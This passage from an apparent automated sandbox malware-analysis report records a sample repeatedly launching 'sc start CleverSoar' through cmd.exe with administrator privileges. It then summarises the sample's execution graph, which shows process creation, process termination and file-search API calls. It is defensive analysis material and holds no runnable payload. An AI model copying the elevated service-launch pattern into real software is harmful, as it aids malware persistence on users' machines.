                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:57
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:58
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:59
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:60
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:61
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:62
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:63
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:64
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:65
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:66
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:67
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:68
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:70
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:71
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:72
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:73
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:74
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:75
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:76
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:77
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:78
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:79
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:80
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:81
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:82
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:83
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:84
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:85
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:86
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:87
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:88
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:89
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:90
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:91
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:92
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:93
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:94
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:95
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:96
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:97
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:98
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:99
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:100
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:101
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:102
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:103
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:104
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:105
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:106
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:1.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:15.5%
                            Total number of Nodes:792
                            Total number of Limit Nodes:13
                            execution_graph 100252 6cc6cad3 100253 6cc6cafd 100252->100253 100254 6cc6cae5 __dosmaperr 100252->100254 100253->100254 100256 6cc6cb48 __dosmaperr 100253->100256 100257 6cc6cb77 100253->100257 100299 6cc60120 18 API calls __fassign 100256->100299 100258 6cc6cb90 100257->100258 100259 6cc6cbab __dosmaperr 100257->100259 100261 6cc6cbe7 __wsopen_s 100257->100261 100258->100259 100279 6cc6cb95 100258->100279 100292 6cc60120 18 API calls __fassign 100259->100292 100293 6cc647bb HeapFree GetLastError __dosmaperr 100261->100293 100262 6cc6cd3e 100265 6cc6cdb4 100262->100265 100269 6cc6cd57 GetConsoleMode 100262->100269 100268 6cc6cdb8 ReadFile 100265->100268 100266 6cc6cc07 100294 6cc647bb HeapFree GetLastError __dosmaperr 100266->100294 100271 6cc6cdd2 100268->100271 100272 6cc6ce2c GetLastError 100268->100272 100269->100265 100273 6cc6cd68 100269->100273 100270 6cc6cc0e 100285 6cc6cbc2 __dosmaperr __wsopen_s 100270->100285 100295 6cc6ac69 20 API calls __wsopen_s 100270->100295 100271->100272 100274 6cc6cda9 100271->100274 100272->100285 100273->100268 100275 6cc6cd6e ReadConsoleW 100273->100275 100280 6cc6cdf7 100274->100280 100281 6cc6ce0e 100274->100281 100274->100285 100275->100274 100278 6cc6cd8a GetLastError 100275->100278 100278->100285 100287 6cc719e5 100279->100287 100297 6cc6cefe 23 API calls 3 library calls 100280->100297 100283 6cc6ce25 100281->100283 100281->100285 100298 6cc6d1b6 21 API calls __wsopen_s 100283->100298 100296 6cc647bb HeapFree GetLastError __dosmaperr 100285->100296 100286 6cc6ce2a 100286->100285 100289 6cc719f2 100287->100289 100290 6cc719ff 100287->100290 100288 6cc71a0b 100288->100262 100289->100262 100290->100288 100300 6cc60120 18 API calls __fassign 100290->100300 100292->100285 100293->100266 100294->100270 100295->100279 100296->100254 100297->100285 100298->100286 100299->100254 100300->100289 100301 6cae4a27 100305 6cae4a5d _strlen 100301->100305 100302 6caf639e 100433 6cc60130 18 API calls 2 library calls 100302->100433 100303 6cae5b6f 100307 6cc56a43 std::_Facet_Register 4 API calls 100303->100307 100304 6cae5b58 100419 6cc56a43 100304->100419 100305->100302 100305->100303 100305->100304 100309 6cae5b09 _Yarn 100305->100309 100307->100309 100392 6cc4aec0 100309->100392 100312 6cae5bad std::ios_base::_Ios_base_dtor 100312->100302 100315 6cae9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100312->100315 100398 6cc54ff0 CreateProcessA 100312->100398 100313 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100313->100315 100314 6cc4aec0 2 API calls 100314->100315 100315->100302 100315->100313 100315->100314 100316 6caea292 Sleep 100315->100316 100336 6caee619 100315->100336 100334 6cae9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100316->100334 100317 6cae660d 100319 6cc56a43 std::_Facet_Register 4 API calls 100317->100319 100318 6cae6624 100320 6cc56a43 std::_Facet_Register 4 API calls 100318->100320 100329 6cae65bc _Yarn _strlen 100319->100329 100320->100329 100321 6cae61cb _strlen 100321->100302 100321->100317 100321->100318 100321->100329 100322 6cc54ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100322->100334 100323 6cae9bbd GetCurrentProcess TerminateProcess 100323->100315 100324 6caf63b2 100434 6cad15e0 18 API calls std::ios_base::_Ios_base_dtor 100324->100434 100326 6caf64f8 100327 6cae6989 100331 6cc56a43 std::_Facet_Register 4 API calls 100327->100331 100328 6cae6970 100330 6cc56a43 std::_Facet_Register 4 API calls 100328->100330 100329->100324 100329->100327 100329->100328 100332 6cae6920 _Yarn 100329->100332 100330->100332 100331->100332 100402 6cc55960 100332->100402 100334->100302 100334->100315 100334->100322 100334->100323 100334->100324 100376 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100334->100376 100382 6cc55960 104 API calls 100334->100382 100335 6caef243 CreateFileA 100351 6caef2a7 100335->100351 100336->100335 100337 6cae69d6 std::ios_base::_Ios_base_dtor _strlen 100337->100302 100338 6cae6dbb 100337->100338 100339 6cae6dd2 100337->100339 100345 6cae6d69 _Yarn _strlen 100337->100345 100340 6cc56a43 std::_Facet_Register 4 API calls 100338->100340 100341 6cc56a43 std::_Facet_Register 4 API calls 100339->100341 100340->100345 100341->100345 100342 6caf02ca 100343 6cae7427 100346 6cc56a43 std::_Facet_Register 4 API calls 100343->100346 100344 6cae7440 100347 6cc56a43 std::_Facet_Register 4 API calls 100344->100347 100345->100324 100345->100343 100345->100344 100348 6cae73da _Yarn 100345->100348 100346->100348 100347->100348 100349 6cc55960 104 API calls 100348->100349 100352 6cae748d std::ios_base::_Ios_base_dtor _strlen 100349->100352 100350 6caf02ac GetCurrentProcess TerminateProcess 100350->100342 100351->100342 100351->100350 100352->100302 100353 6cae79a8 100352->100353 100354 6cae7991 100352->100354 100357 6cae7940 _Yarn _strlen 100352->100357 100356 6cc56a43 std::_Facet_Register 4 API calls 100353->100356 100355 6cc56a43 std::_Facet_Register 4 API calls 100354->100355 100355->100357 100356->100357 100357->100324 100358 6cae7dc9 100357->100358 100359 6cae7de2 100357->100359 100360 6cae7d7c _Yarn 100357->100360 100361 6cc56a43 std::_Facet_Register 4 API calls 100358->100361 100362 6cc56a43 std::_Facet_Register 4 API calls 100359->100362 100363 6cc55960 104 API calls 100360->100363 100361->100360 100362->100360 100364 6cae7e2f std::ios_base::_Ios_base_dtor _strlen 100363->100364 100364->100302 100365 6cae85bf 100364->100365 100366 6cae85a8 100364->100366 100374 6cae8556 _Yarn _strlen 100364->100374 100368 6cc56a43 std::_Facet_Register 4 API calls 100365->100368 100367 6cc56a43 std::_Facet_Register 4 API calls 100366->100367 100367->100374 100368->100374 100369 6cae896a 100371 6cc56a43 std::_Facet_Register 4 API calls 100369->100371 100370 6cae8983 100372 6cc56a43 std::_Facet_Register 4 API calls 100370->100372 100373 6cae891d _Yarn 100371->100373 100372->100373 100375 6cc55960 104 API calls 100373->100375 100374->100324 100374->100369 100374->100370 100374->100373 100377 6cae89d0 std::ios_base::_Ios_base_dtor _strlen 100375->100377 100376->100334 100377->100302 100378 6cae8f1f 100377->100378 100379 6cae8f36 100377->100379 100383 6cae8ecd _Yarn _strlen 100377->100383 100380 6cc56a43 std::_Facet_Register 4 API calls 100378->100380 100381 6cc56a43 std::_Facet_Register 4 API calls 100379->100381 100380->100383 100381->100383 100382->100334 100383->100324 100384 6cae936d 100383->100384 100385 6cae9354 100383->100385 100388 6cae9307 _Yarn 100383->100388 100387 6cc56a43 std::_Facet_Register 4 API calls 100384->100387 100386 6cc56a43 std::_Facet_Register 4 API calls 100385->100386 100386->100388 100387->100388 100389 6cc55960 104 API calls 100388->100389 100391 6cae93ba std::ios_base::_Ios_base_dtor 100389->100391 100390 6cc54ff0 4 API calls 100390->100315 100391->100302 100391->100390 100393 6cc4aed4 100392->100393 100394 6cc4aed6 FindFirstFileA 100392->100394 100393->100394 100395 6cc4af10 100394->100395 100396 6cc4af14 FindClose 100395->100396 100397 6cc4af72 100395->100397 100396->100395 100397->100312 100399 6cc550ca 100398->100399 100400 6cc55080 WaitForSingleObject CloseHandle CloseHandle 100399->100400 100401 6cc550e3 100399->100401 100400->100399 100401->100321 100403 6cc559b7 100402->100403 100435 6cc55ff0 100403->100435 100405 6cc559c8 100454 6caf6ba0 100405->100454 100408 6cc55a9f std::ios_base::_Ios_base_dtor 100411 6cb1e010 67 API calls 100408->100411 100410 6cc559ec 100412 6cc55a54 100410->100412 100418 6cc55a67 100410->100418 100473 6cc56340 100410->100473 100481 6cb32000 100410->100481 100415 6cc55ae2 std::ios_base::_Ios_base_dtor 100411->100415 100491 6cc55b90 100412->100491 100415->100337 100416 6cc55a5c 100512 6caf7090 100416->100512 100506 6cb1e010 100418->100506 100421 6cc56a48 100419->100421 100420 6cc56a62 100420->100309 100421->100420 100424 6cc56a64 std::_Facet_Register 100421->100424 100965 6cc5f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100421->100965 100423 6cc578c3 std::_Facet_Register 100969 6cc59379 RaiseException 100423->100969 100424->100423 100966 6cc59379 RaiseException 100424->100966 